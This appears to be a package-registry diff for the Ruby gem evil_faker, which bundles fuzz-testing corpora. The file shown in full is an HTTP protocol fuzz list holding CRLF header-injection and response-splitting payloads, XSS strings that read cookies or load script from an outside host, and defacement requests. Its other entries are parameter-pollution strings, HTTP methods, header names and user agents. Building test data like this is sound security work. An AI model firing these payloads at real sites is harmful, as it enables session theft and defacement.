evil_faker 0.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +7 -0
- data/CHANGELOG.md +62 -0
- data/GENERATORS.md +164 -0
- data/LICENSE.txt +21 -0
- data/NOTICE.md +196 -0
- data/README.md +156 -0
- data/Rakefile +12 -0
- data/lib/evil_faker/base.rb +50 -0
- data/lib/evil_faker/data/blns.txt +742 -0
- data/lib/evil_faker/data/groups/blns/emoji/emoji.txt +10 -0
- data/lib/evil_faker/data/groups/blns/emoji/emoticons.txt +12 -0
- data/lib/evil_faker/data/groups/blns/emoji/regional.txt +3 -0
- data/lib/evil_faker/data/groups/blns/exploits/cves.txt +4 -0
- data/lib/evil_faker/data/groups/blns/exploits/human.txt +1 -0
- data/lib/evil_faker/data/groups/blns/exploits/ios.txt +3 -0
- data/lib/evil_faker/data/groups/blns/exploits/irc.txt +1 -0
- data/lib/evil_faker/data/groups/blns/filenames.txt +14 -0
- data/lib/evil_faker/data/groups/blns/injection/command.txt +6 -0
- data/lib/evil_faker/data/groups/blns/injection/file_inclusion.txt +2 -0
- data/lib/evil_faker/data/groups/blns/injection/interpolation.txt +9 -0
- data/lib/evil_faker/data/groups/blns/injection/jinja2.txt +2 -0
- data/lib/evil_faker/data/groups/blns/injection/script.txt +236 -0
- data/lib/evil_faker/data/groups/blns/injection/server_code.txt +9 -0
- data/lib/evil_faker/data/groups/blns/injection/sql.txt +8 -0
- data/lib/evil_faker/data/groups/blns/injection/xxe.txt +1 -0
- data/lib/evil_faker/data/groups/blns/numeric/numeric.txt +71 -0
- data/lib/evil_faker/data/groups/blns/numeric/unicode_numbers.txt +2 -0
- data/lib/evil_faker/data/groups/blns/profanity.txt +22 -0
- data/lib/evil_faker/data/groups/blns/reserved.txt +19 -0
- data/lib/evil_faker/data/groups/blns/rtl.txt +7 -0
- data/lib/evil_faker/data/groups/blns/terminal.txt +3 -0
- data/lib/evil_faker/data/groups/blns/unicode/accents.txt +4 -0
- data/lib/evil_faker/data/groups/blns/unicode/bom.txt +2 -0
- data/lib/evil_faker/data/groups/blns/unicode/controls.txt +3 -0
- data/lib/evil_faker/data/groups/blns/unicode/font.txt +8 -0
- data/lib/evil_faker/data/groups/blns/unicode/lowercase.txt +2 -0
- data/lib/evil_faker/data/groups/blns/unicode/quotes.txt +11 -0
- data/lib/evil_faker/data/groups/blns/unicode/scripts.txt +2 -0
- data/lib/evil_faker/data/groups/blns/unicode/special.txt +4 -0
- data/lib/evil_faker/data/groups/blns/unicode/symbols.txt +12 -0
- data/lib/evil_faker/data/groups/blns/unicode/trick.txt +5 -0
- data/lib/evil_faker/data/groups/blns/unicode/two_byte.txt +10 -0
- data/lib/evil_faker/data/groups/blns/unicode/upsidedown.txt +2 -0
- data/lib/evil_faker/data/groups/blns/unicode/whitespace.txt +1 -0
- data/lib/evil_faker/data/groups/blns/zalgo.txt +5 -0
- data/lib/evil_faker/data/groups/fuzzdb/email/invalid.txt +26 -0
- data/lib/evil_faker/data/groups/fuzzdb/email/valid.txt +32 -0
- data/lib/evil_faker/data/groups/fuzzdb/emoji/emoji.txt +8 -0
- data/lib/evil_faker/data/groups/fuzzdb/emoji/emoticons.txt +11 -0
- data/lib/evil_faker/data/groups/fuzzdb/emoji/regional.txt +3 -0
- data/lib/evil_faker/data/groups/fuzzdb/exploits/ios.txt +1 -0
- data/lib/evil_faker/data/groups/fuzzdb/headers/mimetypes.txt +1864 -0
- data/lib/evil_faker/data/groups/fuzzdb/headers/protocol.txt +357 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/command.txt +1115 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/directory_traversal.txt +536 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/file_inclusion.txt +906 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/file_upload_bypass.txt +371 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/format_strings.txt +67 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/generic.txt +584 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/integer_overflow.txt +12 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/json.txt +89 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/ldap.txt +35 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/magic_hashes.txt +24 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/nosql.txt +17 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/open_redirect.txt +37 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/rfi.txt +2241 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/script.txt +930 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/server_side_include.txt +78 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/source_disclosure.txt +18 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/sql.txt +661 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/ssrf.txt +56 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/type_confusion.txt +329 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/xpath.txt +13 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/xxe.txt +65 -0
- data/lib/evil_faker/data/groups/fuzzdb/routes/debug_params.txt +157 -0
- data/lib/evil_faker/data/groups/fuzzdb/routes/directory_indexing.txt +15 -0
- data/lib/evil_faker/data/groups/fuzzdb/routes/local_paths.txt +26 -0
- data/lib/evil_faker/data/groups/fuzzdb/rtl.txt +5 -0
- data/lib/evil_faker/data/groups/fuzzdb/terminal.txt +3 -0
- data/lib/evil_faker/data/groups/fuzzdb/unicode/bad_chars.txt +15 -0
- data/lib/evil_faker/data/groups/fuzzdb/unicode/special.txt +31 -0
- data/lib/evil_faker/data/groups/fuzzdb/unicode/trick.txt +5 -0
- data/lib/evil_faker/data/groups/fuzzdb/unicode/two_byte.txt +9 -0
- data/lib/evil_faker/data/groups/fuzzdb/unicode/upsidedown.txt +2 -0
- data/lib/evil_faker/data/groups/intruder_payloads/filenames.txt +124 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/command.txt +445 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/directory_traversal.txt +2578 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/file_inclusion.txt +698 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/generic.txt +1401 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/overflow.txt +36 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/script.txt +61 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/server_side_include.txt +18 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/sql.txt +753 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/xxe.txt +66 -0
- data/lib/evil_faker/data/groups/intruder_payloads/unicode/bad_chars.txt +1 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/headers/cache_deception.txt +1125 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/command.txt +496 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/directory_traversal.txt +22607 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/file_inclusion.txt +4787 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/ldap.txt +60 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/nosql.txt +26 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/open_redirect.txt +305 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/script.txt +2165 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/sql.txt +1354 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/ssti.txt +105 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/xxe.txt +102 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/routes/admin_interfaces.txt +52 -0
- data/lib/evil_faker/groups/email.rb +11 -0
- data/lib/evil_faker/groups/emoji.rb +12 -0
- data/lib/evil_faker/groups/exploits.rb +13 -0
- data/lib/evil_faker/groups/filenames.rb +8 -0
- data/lib/evil_faker/groups/headers.rb +12 -0
- data/lib/evil_faker/groups/injection.rb +35 -0
- data/lib/evil_faker/groups/numeric.rb +11 -0
- data/lib/evil_faker/groups/profanity.rb +8 -0
- data/lib/evil_faker/groups/reserved.rb +8 -0
- data/lib/evil_faker/groups/routes.rb +13 -0
- data/lib/evil_faker/groups/rtl.rb +8 -0
- data/lib/evil_faker/groups/terminal.rb +8 -0
- data/lib/evil_faker/groups/unicode.rb +23 -0
- data/lib/evil_faker/groups/zalgo.rb +8 -0
- data/lib/evil_faker/source_base.rb +30 -0
- data/lib/evil_faker/sources/blns.rb +8 -0
- data/lib/evil_faker/sources/fuzzdb.rb +8 -0
- data/lib/evil_faker/sources/intruder_payloads.rb +8 -0
- data/lib/evil_faker/sources/payloads_all_the_things.rb +8 -0
- data/lib/evil_faker/version.rb +5 -0
- data/lib/evil_faker.rb +13 -0
- data/scripts/blns_build_corpus.rb +159 -0
- data/scripts/fuzzdb_build_corpus.rb +166 -0
- data/scripts/generate_namespaces.rb +87 -0
- data/scripts/intruder_payloads_build_corpus.rb +112 -0
- data/scripts/payloads_all_the_things_build_corpus.rb +74 -0
- data/sig/evil_faker.rbs +4 -0
- metadata +181 -0
|
@@ -0,0 +1,357 @@
|
|
|
1
|
+
%0d%0a
|
|
2
|
+
%0d%0a%0d%0a
|
|
3
|
+
r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0a<html>Injected%02Content</html>
|
|
4
|
+
%0d%0d%0a%0a
|
|
5
|
+
0x0D0x0A
|
|
6
|
+
0x0D0x0D0x0A0x0A
|
|
7
|
+
\r\n
|
|
8
|
+
%5cr%5cn
|
|
9
|
+
%0%0d%0ad%0%0d%0aa
|
|
10
|
+
%0%0D%0AD%0%0D%0AA
|
|
11
|
+
%0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4
|
|
12
|
+
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
|
|
13
|
+
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
|
|
14
|
+
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com
|
|
15
|
+
%0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E
|
|
16
|
+
%0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E
|
|
17
|
+
%22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22
|
|
18
|
+
%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
|
|
19
|
+
%0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E
|
|
20
|
+
?id=id=1
|
|
21
|
+
&id=1?id=2
|
|
22
|
+
?id['&id=1']=2
|
|
23
|
+
?id[1&id=2]=1
|
|
24
|
+
?id=1&id=2
|
|
25
|
+
&id=1&id=2
|
|
26
|
+
?id=1%26id%3D2
|
|
27
|
+
?id&id=1
|
|
28
|
+
????id=1
|
|
29
|
+
&&&&id=1
|
|
30
|
+
?id=id['1']=2
|
|
31
|
+
?id=1#id=2
|
|
32
|
+
?id==1
|
|
33
|
+
?id===1
|
|
34
|
+
;id=1?id=2
|
|
35
|
+
?id;id=1
|
|
36
|
+
&id=1;id=2
|
|
37
|
+
?id=1,2
|
|
38
|
+
?id1,id2=1
|
|
39
|
+
?id[=1&id=2]=3
|
|
40
|
+
?id[&id=2]=1
|
|
41
|
+
?id=[1,2]
|
|
42
|
+
?id&=1
|
|
43
|
+
?id[]=1&id=2
|
|
44
|
+
?id=/:@&=+$&id=2
|
|
45
|
+
?id[=/:@&=+$&id=2]=1
|
|
46
|
+
?id={id:{id:1},2}
|
|
47
|
+
?id[{id:{id[]:1},2}]=3
|
|
48
|
+
?id=%23?id=1
|
|
49
|
+
?id=1%26id=2
|
|
50
|
+
?id=1%2526id=2
|
|
51
|
+
?id=1%c0%a6id=2
|
|
52
|
+
?id=1\uc0a6id=2
|
|
53
|
+
?id=1&id=2
|
|
54
|
+
?id=1&id=2
|
|
55
|
+
?id=1%u0026;id=2
|
|
56
|
+
GET http://{SITE}testsite.com/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>deface!</html> HTTP/1.1GET http://{SITE}/{REDIRECTURL}?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>deface!</html> HTTP/1.1
|
|
57
|
+
%0d%0aX-Injection-Header:%20AttackValue
|
|
58
|
+
OPTIONS
|
|
59
|
+
GET
|
|
60
|
+
HEAD
|
|
61
|
+
POST
|
|
62
|
+
PUT
|
|
63
|
+
DELETE
|
|
64
|
+
TRACE
|
|
65
|
+
TRACK
|
|
66
|
+
CONNECT
|
|
67
|
+
PROPFIND
|
|
68
|
+
PROPPATCH
|
|
69
|
+
MKCOL
|
|
70
|
+
COPY
|
|
71
|
+
MOVE
|
|
72
|
+
LOCK
|
|
73
|
+
UNLOCK
|
|
74
|
+
VERSION-CONTROL
|
|
75
|
+
REPORT
|
|
76
|
+
CHECKOUT
|
|
77
|
+
CHECKIN
|
|
78
|
+
UNCHECKOUT
|
|
79
|
+
MKWORKSPACE
|
|
80
|
+
UPDATE
|
|
81
|
+
LABEL
|
|
82
|
+
MERGE
|
|
83
|
+
BASELINE-CONTROL
|
|
84
|
+
MKACTIVITY
|
|
85
|
+
ORDERPATCH
|
|
86
|
+
ACL
|
|
87
|
+
PATCH
|
|
88
|
+
SEARCH
|
|
89
|
+
ARBITRARY
|
|
90
|
+
BCOPY
|
|
91
|
+
BDELETE
|
|
92
|
+
BMOVE
|
|
93
|
+
BPROPFIND
|
|
94
|
+
BPROPPATCH
|
|
95
|
+
DEBUG
|
|
96
|
+
INDEX
|
|
97
|
+
NOTIFY
|
|
98
|
+
POLL
|
|
99
|
+
RPC_IN_DATA
|
|
100
|
+
RPC_OUT_DATA
|
|
101
|
+
SUBSCRIBE
|
|
102
|
+
UNSUBSCRIBE
|
|
103
|
+
X-MS-ENUMATTS
|
|
104
|
+
Accept
|
|
105
|
+
Accept-Charset
|
|
106
|
+
Accept-Encoding
|
|
107
|
+
Accept-Language
|
|
108
|
+
Accept-Datetime
|
|
109
|
+
Authorization
|
|
110
|
+
Cache-Control
|
|
111
|
+
Connection
|
|
112
|
+
Cookie
|
|
113
|
+
Content-Length
|
|
114
|
+
Content-MD5
|
|
115
|
+
Content-Type
|
|
116
|
+
Date
|
|
117
|
+
Expect
|
|
118
|
+
From
|
|
119
|
+
Host
|
|
120
|
+
If-Match
|
|
121
|
+
If-Modified-Since
|
|
122
|
+
If-None-Match
|
|
123
|
+
If-Range
|
|
124
|
+
If-Unmodified-Since
|
|
125
|
+
Max-Forwards
|
|
126
|
+
Origin
|
|
127
|
+
Pragma
|
|
128
|
+
Proxy-Authorization
|
|
129
|
+
Range
|
|
130
|
+
Referer
|
|
131
|
+
TE
|
|
132
|
+
User-Agent
|
|
133
|
+
Upgrade
|
|
134
|
+
Via
|
|
135
|
+
Warning
|
|
136
|
+
X-Requested-With
|
|
137
|
+
DNT
|
|
138
|
+
X-Forwarded-For
|
|
139
|
+
X-Forwarded-Host
|
|
140
|
+
X-Forwarded-Proto
|
|
141
|
+
Front-End-Https
|
|
142
|
+
X-Http-Method-Override
|
|
143
|
+
X-ATT-DeviceId
|
|
144
|
+
X-Wap-Profile
|
|
145
|
+
Proxy-Connection
|
|
146
|
+
Access-Control-Allow-Origin
|
|
147
|
+
Accept-Ranges
|
|
148
|
+
Age
|
|
149
|
+
Allow
|
|
150
|
+
Content-Encoding
|
|
151
|
+
Content-Language
|
|
152
|
+
Content-Location
|
|
153
|
+
Content-Disposition
|
|
154
|
+
Content-Range
|
|
155
|
+
ETag
|
|
156
|
+
Expires
|
|
157
|
+
Last-Modified
|
|
158
|
+
Link
|
|
159
|
+
Location
|
|
160
|
+
P3P
|
|
161
|
+
Proxy-Authenticate
|
|
162
|
+
Refresh
|
|
163
|
+
Retry-After
|
|
164
|
+
Server
|
|
165
|
+
Set-Cookie
|
|
166
|
+
Status
|
|
167
|
+
Strict-Transport-Security
|
|
168
|
+
Trailer
|
|
169
|
+
Transfer-Encoding
|
|
170
|
+
Vary
|
|
171
|
+
WWW-Authenticate
|
|
172
|
+
X-Frame-Options
|
|
173
|
+
Public-Key-Pins
|
|
174
|
+
X-XSS-Protection
|
|
175
|
+
Content-Security-Policy
|
|
176
|
+
X-Content-Security-Policy
|
|
177
|
+
X-WebKit-CSP
|
|
178
|
+
X-Content-Type-Options
|
|
179
|
+
X-Powered-By
|
|
180
|
+
X-UA-Compatible
|
|
181
|
+
aaa:
|
|
182
|
+
aaas:
|
|
183
|
+
about:
|
|
184
|
+
acap:
|
|
185
|
+
adiumxtra:
|
|
186
|
+
afp:
|
|
187
|
+
aim:
|
|
188
|
+
apt:
|
|
189
|
+
aw:
|
|
190
|
+
beshare:
|
|
191
|
+
bitcoin:
|
|
192
|
+
bolo:
|
|
193
|
+
callto:
|
|
194
|
+
cap:
|
|
195
|
+
chrome:
|
|
196
|
+
cid:
|
|
197
|
+
coap:
|
|
198
|
+
content:
|
|
199
|
+
crid:
|
|
200
|
+
cvs:
|
|
201
|
+
data:
|
|
202
|
+
dav:
|
|
203
|
+
dict:
|
|
204
|
+
dns:
|
|
205
|
+
doi:
|
|
206
|
+
ed2k:
|
|
207
|
+
facetime:
|
|
208
|
+
fax:
|
|
209
|
+
feed:
|
|
210
|
+
file:
|
|
211
|
+
finger:
|
|
212
|
+
fish:
|
|
213
|
+
ftp:
|
|
214
|
+
geo:
|
|
215
|
+
gg:
|
|
216
|
+
git:
|
|
217
|
+
gizmoproject:
|
|
218
|
+
go:
|
|
219
|
+
gopher:
|
|
220
|
+
gtalk:
|
|
221
|
+
h323:
|
|
222
|
+
http:
|
|
223
|
+
https:
|
|
224
|
+
iax:
|
|
225
|
+
icap:
|
|
226
|
+
im:
|
|
227
|
+
imap:
|
|
228
|
+
info:
|
|
229
|
+
ipp:
|
|
230
|
+
irc:
|
|
231
|
+
irc6:
|
|
232
|
+
ircs:
|
|
233
|
+
iris.beep:
|
|
234
|
+
iris.lws:
|
|
235
|
+
iris.xpcs:
|
|
236
|
+
iris.xpc:
|
|
237
|
+
iris:
|
|
238
|
+
itms:
|
|
239
|
+
jar:
|
|
240
|
+
javascript:
|
|
241
|
+
keyparc:
|
|
242
|
+
lastfm:
|
|
243
|
+
ldap:
|
|
244
|
+
ldaps:
|
|
245
|
+
lsid:
|
|
246
|
+
magnet:
|
|
247
|
+
mailto:
|
|
248
|
+
maps:
|
|
249
|
+
market:
|
|
250
|
+
message:
|
|
251
|
+
mid:
|
|
252
|
+
mms:
|
|
253
|
+
modem:
|
|
254
|
+
msnim:
|
|
255
|
+
msrps:
|
|
256
|
+
msrp:
|
|
257
|
+
mtqp:
|
|
258
|
+
mumble:
|
|
259
|
+
mupdate:
|
|
260
|
+
mvn:
|
|
261
|
+
news:
|
|
262
|
+
nfs:
|
|
263
|
+
nntp:
|
|
264
|
+
notes:
|
|
265
|
+
opaquelocktoken:
|
|
266
|
+
palm:
|
|
267
|
+
paparazzi:
|
|
268
|
+
platform:
|
|
269
|
+
pop:
|
|
270
|
+
pres:
|
|
271
|
+
prospero:
|
|
272
|
+
proxy:
|
|
273
|
+
psyc:
|
|
274
|
+
query:
|
|
275
|
+
rmi:
|
|
276
|
+
rsync:
|
|
277
|
+
rtmp:
|
|
278
|
+
rtsp:
|
|
279
|
+
secondlife:
|
|
280
|
+
service:
|
|
281
|
+
sftp:
|
|
282
|
+
sgn:
|
|
283
|
+
shttp:
|
|
284
|
+
sieve:
|
|
285
|
+
sip:
|
|
286
|
+
sips:
|
|
287
|
+
skype:
|
|
288
|
+
smb:
|
|
289
|
+
sms:
|
|
290
|
+
snmp:
|
|
291
|
+
soap.beeps:
|
|
292
|
+
soap.beep:
|
|
293
|
+
soldat:
|
|
294
|
+
spotify:
|
|
295
|
+
ssh:
|
|
296
|
+
steam:
|
|
297
|
+
svn:
|
|
298
|
+
tag:
|
|
299
|
+
teamspeak:
|
|
300
|
+
tel:
|
|
301
|
+
telnet:
|
|
302
|
+
tftp:
|
|
303
|
+
things:
|
|
304
|
+
thismessage:
|
|
305
|
+
tip:
|
|
306
|
+
tv:
|
|
307
|
+
udp:
|
|
308
|
+
unreal:
|
|
309
|
+
urn:
|
|
310
|
+
ut2004:
|
|
311
|
+
uuid:
|
|
312
|
+
vemmi:
|
|
313
|
+
ventrilo:
|
|
314
|
+
view-source:
|
|
315
|
+
wais:
|
|
316
|
+
webcal:
|
|
317
|
+
wss:
|
|
318
|
+
ws:
|
|
319
|
+
wtai:
|
|
320
|
+
wyciwyg:
|
|
321
|
+
xfire:
|
|
322
|
+
xmlrpc.beeps:
|
|
323
|
+
xmlrpc.beep :
|
|
324
|
+
xmpp:
|
|
325
|
+
xri:
|
|
326
|
+
ymsgr:
|
|
327
|
+
z39.50r:
|
|
328
|
+
z39.50s:
|
|
329
|
+
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
|
|
330
|
+
User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT)
|
|
331
|
+
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)
|
|
332
|
+
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)
|
|
333
|
+
User-Agent: Mozilla/4.79 [en] (WinNT; U)
|
|
334
|
+
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
|
|
335
|
+
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
|
|
336
|
+
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
|
|
337
|
+
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14
|
|
338
|
+
User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
|
|
339
|
+
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5G77 Safari/525.20
|
|
340
|
+
User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
|
|
341
|
+
User-Agent: Opera/9.27 (Windows NT 5.1; U; en)
|
|
342
|
+
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
|
|
343
|
+
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
|
|
344
|
+
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.25 Safari/525.19
|
|
345
|
+
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19
|
|
346
|
+
User-Agent: Wget/1.8.2
|
|
347
|
+
User-Agent: Mozilla/5.0 (PLAYSTATION 3; 1.00)
|
|
348
|
+
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6))
|
|
349
|
+
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
|
|
350
|
+
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) JBroFuzz/1.4
|
|
351
|
+
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
|
|
352
|
+
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.centos4 Firefox/1.0.7
|
|
353
|
+
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727)
|
|
354
|
+
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
|
|
355
|
+
User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20070606
|
|
356
|
+
User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0.0.14
|
|
357
|
+
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5
|